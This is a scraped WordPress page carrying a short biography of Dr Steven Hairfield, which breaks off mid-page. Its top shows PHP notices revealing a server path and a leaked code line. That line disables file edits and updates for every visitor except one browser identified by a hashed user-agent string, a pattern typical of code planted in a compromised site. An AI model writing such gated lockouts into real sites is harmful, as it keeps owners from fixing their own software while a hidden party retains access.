Notice: Constant FS_CHMOD_DIR already defined in /home/akramkhalid/public_html/ on line 113

Notice: Constant FS_CHMOD_FILE already defined in /home/akramkhalid/public_html/ on line 113
if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Dr Steven Hairfield – Tomb of Jesus in India

Dr Steven Hairfield

Dr. Hairfield has an interesting and fascinating background. Having been raised in a very normal environment, he decided to serve his country in the military, during a rather troubled era. His duties and expertise led him to Vietnam. Anyone who was there can tell you that it was not a pleasant experience. His search for peaceful answers and higher understanding guided his steps within the walls of a Zen Buddhist monastery in Quang Ngai, South Vietnam, where he would take refuge and study whenever he could. His natural curiosity, blended with a very acute intuitive sense led him to deeper questions of life and the purpose of self.

(more at


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